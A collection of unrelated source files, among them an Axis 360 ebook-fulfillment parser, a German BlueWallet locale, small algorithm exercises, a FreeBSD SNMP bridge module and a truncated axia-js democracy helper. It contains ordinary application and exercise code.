availability, 'axis:transactionID', ns) or ""
# Arguments common to FulfillmentInfo and
# Axis360FulfillmentInfo.
kwargs = dict(
data_source_name=DataSource.AXIS_360,
identifier_type=self.id_type,
identifier=axis_identifier
)
if download_url and self.internal_format != self.api.AXISNOW:
# The patron wants a direct link to the book, which we can deliver
# immediately, without making any more API requests.
fulfillment = FulfillmentInfo(
collection=self.collection,
content_link=download_url,
content_type=DeliveryMechanism.ADOBE_DRM,
content=None,
content_expires=None,
**kwargs
)
elif transaction_id:
# We will eventually need to make a request to the
# "getfulfillmentInfo" endpoint, using this
# transaction ID.
#
# For a book delivered in AxisNow format, this will give
# us the Book Vault UUID and ISBN.
#
# For an audiobook, this will give us the Findaway
# content ID, license ID, and session key. We'll also
# need to make a second request to get the audiobook
# metadata.
#
# Axis360FulfillmentInfo can handle both cases.
fulfillment = Axis360FulfillmentInfo(
api=self.api, key=transaction_id, **kwargs
)
else:
# We're out of luck -- we can't fulfill this loan.
fulfillment = None
info = LoanInfo(
collection=self.collection,
data_source_name=DataSource.AXIS_360,
identifier_type=self.id_type,
identifier=axis_identifier,
start_date=start_date, end_date=end_date,
fulfillment_info=fulfillment
)
elif reserved:
end_date = self._xpath1_date(
availability, 'axis:reservedEndDate', ns)
info = HoldInfo(
collection=self.collection,
data_source_name=DataSource.AXIS_360,
identifier_type=self.id_type,
identifier=axis_identifier,
start_date=None,
end_date=end_date,
hold_position=0
)
elif on_hold:
position = self.int_of_optional_subtag(
availability, 'axis:holdsQueuePosition', ns)
info = HoldInfo(
collection=self.collection,
data_source_name=DataSource.AXIS_360,
identifier_type=self.id_type,
identifier=axis_identifier,
start_date=None, end_date=None,
hold_position=position)
return info
class JSONResponseParser(ResponseParser):
"""Most ResponseParsers parse XML documents; subclasses of
JSONResponseParser parse JSON documents.
This only subclasses ResponseParser so it can reuse
_raise_exception_on_error.
"""
@classmethod
def _required_key(cls, key, json_obj):
"""Raise an exception if the given key is not present in the given
object.
"""
if json_obj is None or key not in json_obj:
raise RemoteInitiatedServerError(
"Required key %s not present in Axis 360 fulfillment document: %s" % (
key, json_obj,
),
cls.SERVICE_NAME
)
return json_obj[key]
@classmethod
def verify_status_code(cls, parsed):
"""Assert that the incoming JSON document represents a successful
response.
"""
k = cls._required_key
status = k('Status', parsed)
code = k('Code', status)
message = status.get('Message')
# If the document describes an error condition, raise
# an appropriate exception immediately.
cls._raise_exception_on_error(code, message)
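# Sketch of the document shape implied by the accessors above (values are
# illustrative only):
#   {"Status": {"Code": 3103, "Message": "Invalid title ID"}}
# would raise NotFoundOnRemote via code_to_exception.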
def parse(self, data, *args, **kwargs):
"""Parse a JSON document."""
if isinstance(data, dict):
parsed = data # already parsed
else:
try:
parsed = json.loads(data)
except ValueError, e:
# It's not JSON.
raise RemoteInitiatedServerError(
"Invalid response from Axis 360 (was expecting JSON): %s" % data,
self.SERVICE_NAME
)
# If the response indicates an error condition, don't continue --
# raise an exception immediately.
self.verify_status_code(parsed)
return self._parse(parsed, *args, **kwargs)
def _parse(self, parsed, *args, **kwargs):
"""Parse a document we know to represent success on the
API level. Called by parse() once the high-level details
have been worked out.
"""
raise NotImplementedError()
class Axis360FulfillmentInfoResponseParser(JSONResponseParser):
"""Parse JSON documents into Findaway audiobook manifests or AxisNow manifests."""
def __init__(self, api):
"""Constructor.
:param api: An Axis360API instance, in case the parsing of
a fulfillment document triggers additional API requests.
"""
self.api = api
super(Axis360FulfillmentInfoResponseParser, self).__init__(
self.api.collection
)
def _parse(self, parsed, license_pool):
"""Extract all useful information from a parsed FulfillmentInfo
response.
:param parsed: A dictionary corresponding to a parsed JSON
document.
:param license_pool: The LicensePool for the book that's
being fulfilled.
:return: A 2-tuple (manifest, expiration_date). `manifest` is either
a FindawayManifest (for an audiobook) or an AxisNowManifest (for an ebook).
"""
expiration_date = self._required_key('ExpirationDate', parsed)
expiration_date = self.parse_date(expiration_date)
if 'FNDTransactionID' in parsed:
manifest = self.parse_findaway(parsed, license_pool)
else:
manifest = self.parse_axisnow(parsed)
return manifest, expiration_date
def parse_date(self, date):
if '.' in date:
# Remove 7(?!) decimal places of precision and
# UTC timezone, which are more trouble to parse
# than they're worth.
date = date[:date.rindex('.')]
try:
date = datetime.strptime(date, "%Y-%m-%d %H:%M:%S")
except ValueError:
raise RemoteInitiatedServerError(
"Could not parse expiration date: %s" % date,
self.SERVICE_NAME
)
return date
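# Illustrative input: a value such as "2019-02-11 09:21:14.0962762 +00:00"
# is truncated at its last '.' to "2019-02-11 09:21:14" before parsing.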
def parse_findaway(self, parsed, license_pool):
k = self._required_key
fulfillmentId = k('FNDContentID', parsed)
licenseId = k('FNDLicenseID', parsed)
sessionKey = k('FNDSessionKey', parsed)
checkoutId = k('FNDTransactionID', parsed)
# Acquire the TOC information
metadata_response = self.api.get_audiobook_metadata(fulfillmentId)
parser = AudiobookMetadataParser(self.api.collection)
accountId, spine_items = parser.parse(metadata_response.content)
return FindawayManifest(
license_pool, accountId=accountId, checkoutId=checkoutId,
fulfillmentId=fulfillmentId, licenseId=licenseId,
sessionKey=sessionKey, spine_items=spine_items
)
def parse_axisnow(self, parsed):
k = self._required_key
isbn = k('ISBN', parsed)
book_vault_uuid = k('BookVaultUUID', parsed)
return AxisNowManifest(book_vault_uuid, isbn)
class AudiobookMetadataParser(JSONResponseParser):
"""Parse the results of Axis 360's audiobook metadata API call.
"""
@classmethod
def _parse(cls, parsed):
spine_items = []
accountId = parsed.get('fndaccountid', None)
for item in parsed.get('readingOrder', []):
spine_item = cls._extract_spine_item(item)
if spine_item:
spine_items.append(spine_item)
return accountId, spine_items
@classmethod
def _extract_spine_item(cls, part):
"""Convert an element of the 'readingOrder' list to a SpineItem."""
title = part.get('title')
# Incoming duration is measured in seconds.
duration = part.get('duration', 0)
part_number = int(part.get('fndpart', 0))
sequence = int(part.get('fndsequence', 0))
return SpineItem(title, duration, part_number, sequence)
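# Illustrative 'readingOrder' entry (keys taken from the accessors above;
# values made up):
#   {"title": "Chapter 1", "duration": 1234.0, "fndpart": 1, "fndsequence": 1}
#   -> SpineItem("Chapter 1", 1234.0, 1, 1)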
class AxisNowManifest(object):
"""A simple media type for conveying an entry point into the AxisNow access control
system.
"""
MEDIA_TYPE = DeliveryMechanism.AXISNOW_DRM
def __init__(self, book_vault_uuid, isbn):
"""Constructor.
:param book_vault_uuid: The UUID of a Book Vault.
:param isbn: The ISBN of a book in that Book Vault.
"""
self.book_vault_uuid = book_vault_uuid
self.isbn = isbn
def __unicode__(self):
data = dict(isbn=self.isbn, book_vault_uuid=self.book_vault_uuid)
return json.dumps(data, sort_keys=True)
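# Serialized form (follows from json.dumps with sort_keys=True; values are
# placeholders):
#   {"book_vault_uuid": "<uuid>", "isbn": "<isbn>"}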
class Axis360FulfillmentInfo(APIAwareFulfillmentInfo):
"""An Axis 360-specific FulfillmentInfo implementation for audiobooks
and books served through AxisNow.
We use these instead of normal FulfillmentInfo objects because
putting all this information into FulfillmentInfo would require
one or two extra HTTP requests, and there's often no need to make
those requests.
"""
def do_fetch(self):
_db = self.api._db
license_pool = self.license_pool(_db)
transaction_id = self.key
response = self.api.get_fulfillment_info(transaction_id)
parser = Axis360FulfillmentInfoResponseParser(self.api)
manifest, expires = parser.parse(response.content, license_pool)
self._content = unicode(manifest)
self._content_type = manifest.MEDIA_TYPE
self._content_expires = expires
|
module.exports = {
_: {
storage_is_encrypted: 'Dein Speicher ist verschlüsselt. Zum Entschlüsseln wird ein Passwort benötigt.',
enter_password: 'Gib das Passwort ein',
bad_password: 'Falsches Passwort, nächster Versuch',
never: 'nie',
continue: 'Weiter',
ok: 'OK',
},
wallets: {
select_wallet: 'Wähle eine Wallet',
options: 'Einstellungen',
createBitcoinWallet:
'Um eine Lightning wallet zu verwenden, muss erstmal eine Bitcoin Wallet eingerichtet werden. Bitte erstell oder importier eine Bitcoin Wallet.',
list: {
app_name: 'BlueWallet',
title: 'Wallets',
header:
'Eine Wallet spiegelt ein Paar kryptographischer Schlüssel wider. Einen geheimen Schlüssel und eine Adresse als öffentlichen Schlüssel. Den öffentlichen Schlüssel kann man zum Empfang von Bitcoin teilen.',
add: 'Wallet hinzufügen',
create_a_wallet: 'Wallet erstellen',
create_a_wallet1: 'Es ist kostenlos und du kannst',
create_a_wallet2: 'so viele Wallets erstellen, wie du möchtest',
latest_transaction: 'Letzte Transaktion',
empty_txs1: 'Deine Transaktionen erscheinen hier',
empty_txs2: 'Noch keine Transaktionen',
empty_txs1_lightning:
'Lightning wallet should be used for your daily transactions. Fees are unfairly cheap and speed is blazing fast.',
empty_txs2_lightning: '\nTo start using it tap on "manage funds" and topup your balance.',
tap_here_to_buy: 'Klicke hier, um Bitcoin zu kaufen',
},
reorder: {
title: 'Wallets neu ordnen',
},
add: {
title: 'Wallet hinzufügen',
description:
'Du kannst entweder ein Backup einer Paper-Wallet einscannen (im WIF - Wallet Import Format) oder eine neue Wallet erstellen. SegWit Wallets werden standardmäßig unterstützt.',
scan: 'Scannen',
create: 'Erstellen',
label_new_segwit: 'Neue SegWit Wallet',
label_new_lightning: 'Neue Lightning Wallet',
wallet_name: 'Wallet Name',
wallet_type: 'Typ',
or: 'oder',
import_wallet: 'Wallet importieren',
imported: 'Importiert',
coming_soon: 'Demnächst verfügbar',
lightning: 'Lightning',
bitcoin: 'Bitcoin',
},
details: {
title: 'Wallet',
address: 'Adresse',
type: 'Typ',
label: 'Bezeichnung',
destination: 'Zieladresse',
description: 'Beschreibung',
are_you_sure: 'Bist du dir sicher?',
yes_delete: 'Ja, löschen',
no_cancel: 'Nein, abbrechen',
delete: 'Löschen',
save: 'Sichern',
delete_this_wallet: 'Lösche diese Wallet',
export_backup: 'Exportieren / Backup',
buy_bitcoin: 'Bitcoin kaufen',
show_xpub: 'Wallet XPUB zeigen',
},
export: {
title: 'Wallet exportieren',
},
xpub: {
title: 'Wallet XPUB',
copiedToClipboard: 'In die Zwischenablage kopiert.',
},
import: {
title: 'Importieren',
explanation:
'Gib hier deine mnemonische Phrase, deinen privaten Schlüssel, WIF oder worüber du auch immer verfügst ein. BlueWallet wird bestmöglich dein Format interpretieren und die Wallet importieren',
imported: 'Importiert',
error: 'Fehler beim Import. Ist die Eingabe korrekt?',
success: 'Erfolg',
do_import: 'Importieren',
scan_qr: 'oder QR-Code scannen?',
},
scanQrWif: {
go_back: 'Zurück',
cancel: 'Abbrechen',
decoding: 'Entschlüsseln',
input_password: 'Passwort eingeben',
password_explain: 'Das ist ein mit BIP38 verschlüsselter geheimer Schlüssel',
bad_password: 'Falsches Passwort',
wallet_already_exists: 'Diese Wallet existiert bereits',
bad_wif: 'Falsches WIF',
imported_wif: 'WIF importiert',
with_address: ' mit Adresse ',
imported_segwit: 'SegWit importiert',
imported_legacy: 'Legacy importiert',
imported_watchonly: 'Watch-Only importiert',
},
},
transactions: {
list: {
tabBarLabel: 'Transaktionen',
title: 'Transaktionen',
description: 'Eine Liste eingehender oder ausgehender Transaktionen deiner Wallets',
conf: 'conf',
},
details: {
title: 'Transaktionen',
from: 'Eingehend',
to: 'Ausgehend',
copy: 'Kopieren',
transaction_details: 'Details',
show_in_block_explorer: 'Im Block-Explorer zeigen',
},
},
send: {
header: 'Senden',
details: {
title: 'Transaktion erstellen',
amount_field_is_not_valid: 'Betrageingabe ist nicht korrekt',
fee_field_is_not_valid: 'Gebühreingabe ist nicht korrekt',
address_field_is_not_valid: 'Adresseingabe ist nicht korrekt',
total_exceeds_balance: 'Der zu sendende Betrag ist größer als der verfügbare Betrag.',
create_tx_error: 'Fehler beim Erstellen der Transaktion. Bitte stelle sicher, dass die Adresse korrekt ist.',
address: 'Adresse',
amount_placeholder: 'Betrag (in BTC)',
fee_placeholder: 'plus Gebühr (in BTC)',
note_placeholder: 'Notiz',
cancel: 'Abbrechen',
scan: 'Scan',
send: 'Senden',
create: 'Erstellen',
remaining_balance: 'Verfügbarer Betrag',
},
confirm: {
header: 'Bestätigen',
sendNow: 'Jetzt senden',
},
success: {
done: 'Fertig',
},
create: {
details: 'Details',
title: 'Transaktion erstellen',
error: 'Fehler beim Erstellen der Transaktion. Falsche Adresse oder Betrag?',
go_back: 'Zurück',
this_is_hex: 'Das ist die hexadezimale Darstellung der signierten Transaktion und bereit zum Übertragen an das Netzwerk',
to: 'An',
amount: 'Betrag',
fee: 'Gebühr',
tx_size: 'Größe',
satoshi_per_byte: 'Satoshi pro Byte',
memo: 'Memo',
broadcast: 'Übertragen',
not_enough_fee: 'Gebühr zu gering. Erhöhe die Gebühr',
},
},
receive: {
header: 'Erhalten',
details: {
title: 'Teile diese Adresse mit dem Zahlenden',
share: 'Teilen',
copiedToClipboard: 'In die Zwischenablage kopiert.',
label: 'Beschreibung',
create: 'Create',
setAmount: 'Zu erhaltender Betrag',
},
},
buyBitcoin: {
header: 'Kaufe Bitcoin',
tap_your_address: 'Adresse antippen, um sie in die Zwischenablage zu kopieren:',
copied: 'In die Zwischenablage kopiert!',
},
settings: {
header: 'Einstellungen',
plausible_deniability: 'Glaubhafte Täuschung...',
storage_not_encrypted: 'Speicher nicht verschlüsselt',
storage_encrypted: 'Speicher verschlüsselt',
password: 'Passwort',
password_explain: 'Erstelle das Passwort zum Entschlüsseln des Speichers',
retype_password: 'Passwort wiederholen',
passwords_do_not_match: 'Passwörter stimmen nicht überein',
encrypt_storage: 'Speicher verschlüsseln',
lightning_settings: 'Lightning Einstellungen',
lightning_settings_explain:
'Bitte installier Lndhub, um mit deiner eigenen LND Node zu verbinden' +
' und setz seine URL hier in den Einstellungen. Lass das Feld leer, um Standard- ' +
'LndHub\n (lndhub.io) zu verwenden',
electrum_settings: 'Electrum Settings',
electrum_settings_explain: 'Set to blank to use default',
save: 'Speichern',
about: 'Über',
language: 'Sprache',
currency: 'Währung',
advanced_options: 'Advanced Options',
enable_advanced_mode: 'Enable advanced mode',
},
plausibledeniability: {
title: 'Glaubhafte Täuschung',
help:
'Unter bestimmten Umständen könntest du dazu gezwungen werden, ' +
'dein Passwort preiszugeben. Um deine Bitcoins zu sichern, kann ' +
'BlueWallet einen weiteren verschlüsselten Speicher mit einem ' +
'anderen Passwort erstellen. Unter Druck kannst du das ' +
'zweite Passwort an Fremde weitergeben. Wenn eingegeben, öffnet ' +
'BlueWallet einen anderen Speicher zur Täuschung. Dies wirkt ' +
'auf Fremde täuschend echt und dein Hauptspeicher bleibt geheim ' +
'und sicher.',
help2: 'Der andere Speicher ist voll funktional und man kann einen Minimalbetrag für die Glaubhaftigkeit hinterlegen.',
create_fake_storage: 'Erstelle verschlüsselten Speicher zur Täuschung',
go_back: 'Zurück',
create_password: 'Erstelle ein Passwort',
create_password_explanation: 'Das Passwort für den täuschenden Speicher darf nicht mit dem deines Hauptspeichers übereinstimmen',
password_should_not_match: 'Das Passwort für den täuschenden Speicher darf nicht mit dem deines Hauptspeichers übereinstimmen',
retype_password: 'Passwort wiederholen',
passwords_do_not_match: 'Passwörter stimmen nicht überein. Neuer Versuch',
success: 'Erfolg!',
},
lnd: {
title: 'Beträge verwalten',
choose_source_wallet: 'Wähle eine Wallet als Zahlungsquelle',
refill_lnd_balance: 'Lade deine Lightning Wallet auf',
refill: 'Aufladen',
withdraw: 'Abheben',
placeholder: 'Invoice',
sameWalletAsInvoiceError:
'Du kannst nicht die Rechnung mit der Wallet begleichen, die du für die Erstellung dieser Rechnung verwendet hast.',
},
pleasebackup: {
title: 'Your wallet is created...',
text:
"Please take a moment to write down this mnemonic phrase on a piece of paper. It's your backup you can use to restore the wallet on other device. You can use Electrum wallet on desktop (https://electrum.org/) to restore the same wallet.",
ok: 'OK, I wrote this down!',
},
lndViewInvoice: {
wasnt_paid_and_expired: 'This invoice was not paid for and has expired',
has_been_paid: 'This invoice has been paid for',
please_pay: 'Please pay',
sats: 'sats',
for: 'For:',
additional_info: 'Additional Information',
open_direct_channel: 'Open direct channel with this node:',
},
};
|
from queue import Queue
def truckTour(petrolpumps):
route = Queue()
# put all of the pumps in the queue
for p in petrolpumps:
route.put(p)
start = 0
tank = 0
# keep track of how many pumps we've traversed
traversed = 0
# loop over every pair in the input array
while traversed < len(petrolpumps):
# check how much gas is left after traveling to the next pump
# at the current pump, keep track of gas - distance
pump = route.get()
gas, distance = pump
# update our tank amount with the difference between
# gas and distance
tank += (gas - distance)
# if we see that we have a negative amount of gas left,
if tank < 0:
# that means this pump is not valid
# consider the next pump
start += traversed + 1
# reset the tank
tank = 0
traversed = 0
else:
traversed += 1
# add the pump back to the queue
route.put(pump)
# return the pump index
return start
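# Example (each pump is a [gas, distance-to-next-pump] pair; values are
# illustrative):
#   truckTour([[1, 5], [10, 3], [3, 4]]) -> 1
# Starting at index 1 the tank never goes negative: 10-3=7, 7+3-4=6, 6+1-5=2.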
|
import os
from cfdata.tabular import *
from cfml import *
# datasets
boston = TabularDataset.boston()
prices_file = os.path.join("datasets", "prices.txt")
prices = TabularData(task_type=TaskTypes.REGRESSION).read(prices_file).to_dataset()
breast_cancer = TabularDataset.breast_cancer()
digits = TabularDataset.digits()
column_indices = list(range(digits.num_features))
digits_onehot = TabularData.from_dataset(digits, categorical_columns=column_indices).to_dataset()
# numpy poly fit
Base.make("poly").fit(*prices.xy).visualize1d(*prices.xy)
# linear regression
Base.make("linear_regression").fit(*prices.xy).visualize1d(*prices.xy).plot_loss_curve()
# logistic regression
Base.make("logistic_regression").fit(*breast_cancer.xy).plot_loss_curve()
# multinomial naive bayes
Base.make("multinomial_nb").fit(*digits_onehot.xy)
# gaussian naive bayes
Base.make("gaussian_nb").fit(*breast_cancer.xy)
# linear support vector machine (classification)
Base.make("linear_svc").fit(breast_cancer.x, breast_cancer.y).plot_loss_curve()
# linear support vector machine (regression)
Base.make("linear_svr").fit(boston.x, boston.y).plot_loss_curve()
# support vector machine (classification)
Base.make("svc").fit(breast_cancer.x, breast_cancer.y).plot_loss_curve()
# support vector machine (regression)
Base.make("svr").fit(boston.x, boston.y).plot_loss_curve()
# fully connected neural network (classification)
Base.make("fcnn_clf").fit(*breast_cancer.xy).plot_loss_curve()
# fully connected neural network (regression)
Base.make("fcnn_reg").fit(*boston.xy).plot_loss_curve()
|
const mongoose = require('mongoose');
/**
* Product model schema.
*/
const productSchema = new mongoose.Schema({
name: { type: String, required: true },
price: { type: Number, required: true },
description: { type: String }
});
module.exports = mongoose.model('product', productSchema);
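// Illustrative usage (assumes an existing mongoose connection; values are
// placeholders):
//   const Product = require('./product');
//   new Product({ name: 'Widget', price: 9.99 }).save();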
|
'''
Problem:
A palindromic number reads the same both ways. The largest palindrome made from the product of two 2-digit numbers is 9009 = 91 x 99.
Find the largest palindrome made from the product of two 3-digit numbers which is less than N.
'''
import sys

n = int(input())
for i in range(n - 1, 10000, -1):
    temp = str(i)
    if temp == temp[::-1]:
        j = 999
        while j != 99:
            # i must divide evenly by j and the quotient must also be 3 digits
            if i % j == 0 and len(str(i // j)) == 3:
                print(i)
                sys.exit(0)
            j -= 1
|
/*-
* SPDX-License-Identifier: BSD-2-Clause-FreeBSD
*
* Copyright (c) 2006 Shteryana Shopova <syrinx@FreeBSD.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* Bridge MIB implementation for SNMPd.
*
* $FreeBSD$
*/
#include <sys/param.h>
#include <sys/queue.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <net/if_mib.h>
#include <net/if_types.h>
#include <errno.h>
#include <stdarg.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <syslog.h>
#include <bsnmp/snmpmod.h>
#include <bsnmp/snmp_mibII.h>
#define SNMPTREE_TYPES
#include "bridge_tree.h"
#include "bridge_snmp.h"
#include "bridge_oid.h"
static struct lmodule *bridge_module;
/* For the registration. */
static const struct asn_oid oid_dot1Bridge = OIDX_dot1dBridge;
/* The registration. */
static uint reg_bridge;
/* Periodic timer for polling all bridges' data. */
static void *bridge_data_timer;
static void *bridge_tc_timer;
static int bridge_data_maxage = SNMP_BRIDGE_DATA_MAXAGE;
static int bridge_poll_ticks = SNMP_BRIDGE_POLL_INTERVAL * 100;
static int bridge_tc_poll_ticks = SNMP_BRIDGE_TC_POLL_INTERVAL * 100;
/*
* Our default bridge, whose info will be visible under
* the dot1dBridge subtree and functions to set/fetch it.
*/
static char bif_default_name[IFNAMSIZ] = "bridge0";
static struct bridge_if *bif_default;
struct bridge_if *
bridge_get_default(void)
{
struct mibif *ifp;
if (bif_default != NULL) {
/* Walk through the mibII interface list. */
for (ifp = mib_first_if(); ifp != NULL; ifp = mib_next_if(ifp))
if (strcmp(ifp->name, bif_default->bif_name) == 0)
break;
if (ifp == NULL)
bif_default = NULL;
}
return (bif_default);
}
void
bridge_set_default(struct bridge_if *bif)
{
bif_default = bif;
syslog(LOG_ERR, "Set default bridge interface to: %s",
bif == NULL ? "(none)" : bif->bif_name);
}
const char *
bridge_get_default_name(void)
{
return (bif_default_name);
}
static int
bridge_set_default_name(const char *bif_name, uint len)
{
struct bridge_if *bif;
if (len >= IFNAMSIZ)
return (-1);
bcopy(bif_name, bif_default_name, len);
bif_default_name[len] = '\0';
if ((bif = bridge_if_find_ifname(bif_default_name)) == NULL) {
bif_default = NULL;
return (0);
}
bif_default = bif;
return (1);
}
int
bridge_get_data_maxage(void)
{
return (bridge_data_maxage);
}
static void
bridge_set_poll_ticks(int poll_ticks)
{
if (bridge_data_timer != NULL)
timer_stop(bridge_data_timer);
bridge_poll_ticks = poll_ticks;
bridge_data_timer = timer_start_repeat(bridge_poll_ticks,
bridge_poll_ticks, bridge_update_all, NULL, bridge_module);
}
/*
* The bridge module configuration via SNMP.
*/
static int
bridge_default_name_save(struct snmp_context *ctx, const char *bridge_default)
{
if ((ctx->scratch->int1 = strlen(bridge_default)) >= IFNAMSIZ)
return (-1);
if ((ctx->scratch->ptr1 = malloc(IFNAMSIZ)) == NULL)
return (-1);
strncpy(ctx->scratch->ptr1, bridge_default, ctx->scratch->int1);
return (0);
}
int
op_begemot_bridge_config(struct snmp_context *ctx, struct snmp_value *val,
uint sub, uint iidx __unused, enum snmp_op op)
{
switch (op) {
case SNMP_OP_GET:
switch (val->var.subs[sub - 1]) {
case LEAF_begemotBridgeDefaultBridgeIf:
return (string_get(val, bridge_get_default_name(), -1));
case LEAF_begemotBridgeDataUpdate:
val->v.integer = bridge_data_maxage;
return (SNMP_ERR_NOERROR);
case LEAF_begemotBridgeDataPoll:
val->v.integer = bridge_poll_ticks / 100;
return (SNMP_ERR_NOERROR);
}
abort();
case SNMP_OP_GETNEXT:
abort();
case SNMP_OP_SET:
switch (val->var.subs[sub - 1]) {
case LEAF_begemotBridgeDefaultBridgeIf:
/*
* Cannot use string_save() here - requires either
* a fixed-sized or var-length string - not less
* than or equal.
*/
if (bridge_default_name_save(ctx,
bridge_get_default_name()) < 0)
return (SNMP_ERR_RES_UNAVAIL);
if (bridge_set_default_name(val->v.octetstring.octets,
val->v.octetstring.len) < 0)
return (SNMP_ERR_BADVALUE);
return (SNMP_ERR_NOERROR);
case LEAF_begemotBridgeDataUpdate:
if (val->v.integer < SNMP_BRIDGE_DATA_MAXAGE_MIN ||
val->v.integer > SNMP_BRIDGE_DATA_MAXAGE_MAX)
return (SNMP_ERR_WRONG_VALUE);
ctx->scratch->int1 = bridge_data_maxage;
bridge_data_maxage = val->v.integer;
return (SNMP_ERR_NOERROR);
case LEAF_begemotBridgeDataPoll:
if (val->v.integer < SNMP_BRIDGE_POLL_INTERVAL_MIN ||
val->v.integer > SNMP_BRIDGE_POLL_INTERVAL_MAX)
return (SNMP_ERR_WRONG_VALUE);
ctx->scratch->int1 = val->v.integer;
return (SNMP_ERR_NOERROR);
}
abort();
case SNMP_OP_ROLLBACK:
switch (val->var.subs[sub - 1]) {
case LEAF_begemotBridgeDefaultBridgeIf:
bridge_set_default_name(ctx->scratch->ptr1,
ctx->scratch->int1);
free(ctx->scratch->ptr1);
break;
case LEAF_begemotBridgeDataUpdate:
bridge_data_maxage = ctx->scratch->int1;
break;
}
return (SNMP_ERR_NOERROR);
case SNMP_OP_COMMIT:
switch (val->var.subs[sub - 1]) {
case LEAF_begemotBridgeDefaultBridgeIf:
free(ctx->scratch->ptr1);
break;
case LEAF_begemotBridgeDataPoll:
bridge_set_poll_ticks(ctx->scratch->int1 * 100);
break;
}
return (SNMP_ERR_NOERROR);
}
abort();
}
/*
* Bridge mib module initialization hook.
* Returns 0 on success, < 0 on error.
*/
static int
bridge_init(struct lmodule * mod, int argc __unused, char *argv[] __unused)
{
bridge_module = mod;
if (bridge_kmod_load() < 0)
return (-1);
if (bridge_ioctl_init() < 0)
return (-1);
/* Register to get creation messages for bridge interfaces. */
if (mib_register_newif(bridge_attach_newif, bridge_module)) {
syslog(LOG_ERR, "Cannot register newif function: %s",
strerror(errno));
return (-1);
}
return (0);
}
/*
* Bridge mib module finalization hook.
*/
static int
bridge_fini(void)
{
mib_unregister_newif(bridge_module);
or_unregister(reg_bridge);
if (bridge_data_timer != NULL) {
timer_stop(bridge_data_timer);
bridge_data_timer = NULL;
}
if (bridge_tc_timer != NULL) {
timer_stop(bridge_tc_timer);
bridge_tc_timer = NULL;
}
bridge_ifs_fini();
bridge_ports_fini();
bridge_addrs_fini();
return (0);
}
/*
* Bridge mib module start operation.
*/
static void
bridge_start(void)
{
reg_bridge = or_register(&oid_dot1Bridge,
"The IETF MIB for Bridges (RFC 4188).", bridge_module);
bridge_data_timer = timer_start_repeat(bridge_poll_ticks,
bridge_poll_ticks, bridge_update_all, NULL, bridge_module);
bridge_tc_timer = timer_start_repeat(bridge_tc_poll_ticks,
bridge_tc_poll_ticks, bridge_update_tc_time, NULL, bridge_module);
}
static void
bridge_dump(void)
{
struct bridge_if *bif;
if ((bif = bridge_get_default()) == NULL)
syslog(LOG_ERR, "Dump: no default bridge interface");
else
syslog(LOG_ERR, "Dump: default bridge interface %s",
bif->bif_name);
bridge_ifs_dump();
bridge_pf_dump();
}
const struct snmp_module config = {
.comment = "This module implements the bridge mib (RFC 4188).",
.init = bridge_init,
.fini = bridge_fini,
.start = bridge_start,
.tree = bridge_ctree,
.dump = bridge_dump,
.tree_size = bridge_CTREE_SIZE,
};
|
# -*- coding: utf-8 -*-
"""
Let’s say I give you a list saved in a variable:
a = [1, 4, 9, 16, 25, 36, 49, 64, 81, 100].
Write one line of Python that takes this list a and makes a
new list that has only the even elements of this list in it.
"""
a = [1, 4, 9, 16, 25, 36, 49, 64, 81, 100]
b = [x for x in a if x % 2 == 0]  # keep only the even elements of a
print(a)
print(b)
|
var gulp = require('gulp');
var copy = require('./commands/CopyFiles');
var elixir = require('laravel-elixir');
var config = elixir.config;
/*
|----------------------------------------------------------------
| Copying
|----------------------------------------------------------------
|
| This task offers a simple way to copy files from one place to
| another. That's it. Not any more complicated than that!
|
*/
elixir.extend('copy', function(source, destination) {
return copy(source, destination);
});
|
import _defineProperty from "@babel/runtime/helpers/esm/defineProperty";
function ownKeys(object, enumerableOnly) { var keys = Object.keys(object); if (Object.getOwnPropertySymbols) { var symbols = Object.getOwnPropertySymbols(object); if (enumerableOnly) { symbols = symbols.filter(function (sym) { return Object.getOwnPropertyDescriptor(object, sym).enumerable; }); } keys.push.apply(keys, symbols); } return keys; }
function _objectSpread(target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i] != null ? arguments[i] : {}; if (i % 2) { ownKeys(Object(source), true).forEach(function (key) { _defineProperty(target, key, source[key]); }); } else if (Object.getOwnPropertyDescriptors) { Object.defineProperties(target, Object.getOwnPropertyDescriptors(source)); } else { ownKeys(Object(source)).forEach(function (key) { Object.defineProperty(target, key, Object.getOwnPropertyDescriptor(source, key)); }); } } return target; }
// Copyright 2017-2021 @axia-js/api-derive authors & contributors
// SPDX-License-Identifier: Apache-2.0
import { catchError, combineLatest, map, of, switchMap } from 'rxjs';
import { isFunction, stringToHex } from '@axia-js/util';
import { memo } from "../util/index.js";
const DEMOCRACY_ID = stringToHex('democrac');
function queryQueue(api) {
return api.query.democracy.dispatchQueue().pipe(switchMap(dispatches => combineLatest([of(dispatches), api.derive.democracy.preimages(dispatches.map(([, hash]) => hash))])), map(([dispatches, images]) => dispatches.map(([at, imageHash, index], dispatchIndex) => ({
at,
image: images[dispatchIndex],
imageHash,
index
}))));
}
function schedulerEntries(api) {
// We don't get entries, but rather we get the keys (triggered via finished referendums) and
// the subscribe to those keys - this means we pickup when the schedulers actually executes
// at a block, the entry for that block will become empty
